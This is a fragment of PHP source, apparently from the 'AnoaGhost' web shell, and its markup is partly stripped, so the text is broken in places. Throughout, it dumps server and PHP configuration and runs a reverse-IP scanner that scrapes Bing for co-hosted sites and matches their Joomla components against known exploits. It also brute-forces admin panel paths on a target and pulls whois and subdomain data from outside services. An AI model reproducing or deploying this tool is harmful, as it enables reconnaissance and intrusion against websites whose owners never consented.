');}} ////// $upsize=getcfg('file_uploads') ? getcfg('upload_max_FILESIZE') : 'Not allowed'; !$dis_func && $dis_func = 'NO'; ///// SERVER $info = array( 1 => array(' ✓ SERVER TIME ',date('Y/m/d h:i:s',$timestamp)), 2 => array('✓ SERVER OS ',PHP_OS), 3 => array('✓ SERVER OS CHARSET ',$_SERVER['HTTP_ACCEPT_LANGUAGE']), 4 => array('✓ PHP RUN MODE ',strtoupper(php_sapi_name())), ///// PHP 5 => array('✓ PHP VERSION ',PHP_VERSION), 6 => array('✓ ADMINISTRATOR ',$adminmail), 7 => array('✓ ALLOW_URL_FOPEN ',getcfg('allow_url_fopen')), 8 => array('✓ ENABLE_DL ',getcfg('enable_dl')), 9 => array('✓ DISPLAY_ERRORS ',getcfg('display_errors')), 10 => array('✓ REGISTER_GLOBALS ',getcfg('register_globals')), 11 => array('✓ MAGIC_QUOTES_GPC ',getcfg('magic_quotes_gpc')), 12 => array('✓ MEMORY_LIMIT ',getcfg('memory_limit')), 13 => array('✓ POST_MAX_SIZE ',getcfg('post_max_size')), 14 => array('✓ UPLOAD_MAX_FILESIZE ',$upsize),); if($phpvarname) { m($phpvarname .' : '.getcfg($phpvarname));} ///// SERVER $hp = array(0=> 'INFO SERVER', 1=> 'INFO PHP'); for($a=0;$a<2;$a++) { p('

'); p('
    '); if ($a==0) { for($i=1;$i<=9;$i++) { p('
  • '.$info[$i][0].':'.$info[$i][1].'
  • ');} } elseif ($a == 1) {for($i=10;$i<=23;$i++) { p('
  • '.$info[$i][0].':'.$info[$i][1].'
  • ');}} p('
');} $FOTTER2 = "
"; echo ''. $FOTTER2 .'' ; $COPYRIGHT1 = base64_decode("Q09QWVJJR0hUICApIDxhIGhyZWY9Jz9NaXN0ZXI9QWJvdXRzJz4gMjAxNSA8L2E+IHw="); echo ''. $COPYRIGHT1 .' '; $REPORTERROR = "| ALL RIGHT RESERVED™ |"; echo ''. $REPORTERROR .'
'; echo ''. $THEEND .'' ; exit;} if ($_GET["AnoaGhost"] == "J-Scann3r"){ echo "
"; echo '

'; ?> " style="width:50%;">

NOT FOUND
"; }else{ echo""; } } function check_com($url){ $source = @file_get_contents($url); preg_match_all('{option,(.*?)/}i',$source,$f); preg_match_all('{option=(.*?)(&|&|")}i',$source,$f2); preg_match_all('{/components/(.*?)/}i',$source,$f3); $arz=array_merge($f2[1],$f[1],$f3[1]); $coms=array(); foreach(array_unique($arz) as $x){ $coms[]=$x; } foreach($coms as $comm){ echo ""; check_exploit($comm); } } function sec($site){ preg_match_all('{http://(.*?)(/index.php)}siU',$site, $sites); if(eregi("www",$sites[0][0])){ return $site=str_replace("index.php","",$sites[0][0]); }else{ return $site=str_replace("http://","http://www.",str_replace("index.php","",$sites[0][0])); }} $npages = 50000; if ($_POST) { $ip = trim(strip_tags($_POST['site'])); $npage = 1; $allLinks = array(); while($npage <= $npages) { $x=@file_get_contents('http://www.bing.com/search?q=ip%3A' . $ip . '+index.php?option=com&first=' . $npage); if ($x) { preg_match_all('(
.*

.*(.*).*

.*
)siU', $x, $findlink); foreach ($findlink[1] as $fl) $allLinks[]=sec($fl); $npage = $npage + 10; if (preg_match('(first=' . $npage . '&)siU', $x, $linksuiv) == 0) break; } else break; } $allDmns = array(); foreach ($allLinks as $kk => $vv){ $allDmns[] = $vv; } echo'

DOMAINS :





DOWNLOAD
FOUND<=
$comm
SERVER IP     : '.$ip.'
SITES FOUND   : '.count(array_unique($allDmns)).'
'; echo "

"; echo''; foreach(array_unique($allDmns) as $h3h3){ echo''; check_com($h3h3); } echo"
'.$h3h3.'EXPLOIT-DBCHALLENGE OF EXPLOITING ..!
"; echo "
";$FOTTER2 = "
"; echo ''. $FOTTER2 .'' ; $COPYRIGHT1 = base64_decode("Q09QWVJJR0hUICApIDxhIGhyZWY9Jz9NaXN0ZXI9QWJvdXRzJz4gMjAxNSA8L2E+IHw="); echo ''. $COPYRIGHT1 .' '; $REPORTERROR = "| ALL RIGHT RESERVED™ |"; echo ''. $REPORTERROR .'
'; echo ''. $THEEND .'' ;} exit;} ////// FINDERADMIN if ($_GET['AnoaGhost'] == 'FinderAdmin') { $FOTTER2 = "
"; echo ''. $FOTTER2 .'' ; $COPYRIGHT1 = base64_decode("Q09QWVJJR0hUICApIDxhIGhyZWY9Jz9NaXN0ZXI9QWJvdXRzJz4gMjAxNSA8L2E+IHw="); echo ''. $COPYRIGHT1 .' '; $REPORTERROR = "| ALL RIGHT RESERVED™ |"; echo ''. $REPORTERROR .'
'; echo ''. $THEEND .'' ; ////// FOOTER echo "
"; echo "
"; ?>
Coded By AnoaGhost Klio
URL : HTTP://TARGET.COM

" style="width:40%" >

$test) { $Inject = curl_init(); curl_setopt($Inject, CURLOPT_RETURNTRANSFER, 1); curl_setopt($Inject, CURLOPT_HEADER, 1); curl_setopt($Inject, CURLOPT_URL, $site.$test); $result = curl_exec($Inject); curl_close($Inject); //print $url; if (preg_match("/200 OK/", $result)){ echo "
[ DONE! : $site$test ]"; } else if (preg_match("/401 Unauthorized/", $result)) { echo "
[ DONE! : <
$site$test "; } } echo "

✓ SCAN FINISHED

"; } exit; } if ($_GET['AnoaGhost'] == 'whois') { echo '
'; echo "

"; @set_time_limit(0); @error_reporting(0); function sws_domain_info($site) { $getip = @file_get_contents("http://networktools.nl/whois/$site"); flush(); $ip = @findit($getip,'
','
'); return $ip; flush(); } function sws_net_info($site) { $getip = @file_get_contents("http://networktools.nl/asinfo/$site"); $ip = @findit($getip,'
','
'); return $ip; flush(); } function sws_site_ser($site) { $getip = @file_get_contents("http://networktools.nl/reverseip/$site"); $ip = @findit($getip,'
','
'); return $ip; flush(); } function sws_sup_dom($site) { $getip = @file_get_contents("http://www.magic-net.info/dns-and-ip-tools.dnslookup?subd=".$site."&Search+subdomains=Find+subdomains"); $ip = @findit($getip,'Nameservers found:','